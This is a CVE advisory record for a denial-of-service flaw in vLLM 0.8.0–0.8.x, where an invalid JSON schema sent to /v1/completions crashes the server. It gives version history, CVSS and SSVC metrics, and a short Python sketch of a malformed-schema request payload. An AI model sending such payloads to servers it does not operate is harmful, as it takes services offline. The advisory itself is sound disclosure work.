vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a guided parameter kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which covers an invalid regex rather than a JSON schema. Version 0.9.0 fixes the issue.
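For context, a request of the shape the advisory describes might look like the sketch below. The parameter name (`guided_json`) follows vLLM's OpenAI-compatible guided-decoding extra params, but the exact payload details are assumptions, not a verified proof of concept; do not send this to a server you do not operate.

```python
import json

# Hypothetical payload sketch. "objecct" is deliberately NOT a valid JSON
# Schema type; a malformed schema like this is what the advisory says crashed
# vulnerable servers (vLLM >= 0.8.0, < 0.9.0) via an uncaught exception
# (CWE-248) when the guided-decoding backend tried to compile it.
invalid_schema = {"type": "objecct"}  # misspelled schema type (assumption)

payload = {
    "model": "example-model",      # placeholder model name
    "prompt": "Reply in JSON.",
    "guided_json": invalid_schema,  # guided-decoding extra param
}

# The serialized body that would be POSTed to /v1/completions.
body = json.dumps(payload)
```

On patched versions (0.9.0 and later) such a request should be rejected with an error response rather than terminating the engine.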
History

Tue, 24 Jun 2025 18:00:00 +0000

Values Added:
  First Time appeared: Vllm; Vllm vllm
  CPEs: cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*
  Vendors & Products: Vllm; Vllm vllm

Sat, 31 May 2025 03:15:00 +0000

References: (updated)
Metrics:
  threat_severity: None → Moderate


Fri, 30 May 2025 21:15:00 +0000

Values Added:
  Metrics: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 30 May 2025 18:45:00 +0000

Values Added:
  Description: vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a guided parameter kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which covers an invalid regex rather than a JSON schema. Version 0.9.0 fixes the issue.
  Title: vLLM DOS: Remotely kill vllm over http with invalid JSON schema
  Weaknesses: CWE-248
  References: (added)
  Metrics: cvssV3_1 {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2025-05-30T20:37:06.015Z

Reserved: 2025-05-28T18:49:07.581Z

Link: CVE-2025-48942

Vulnrichment

Updated: 2025-05-30T20:37:00.956Z

NVD

Status: Analyzed

Published: 2025-05-30T19:15:30.130

Modified: 2025-06-24T17:44:47.737

Link: CVE-2025-48942

Redhat

Severity: Moderate

Published Date: 2025-05-30T18:33:40Z

Links: CVE-2025-48942 - Bugzilla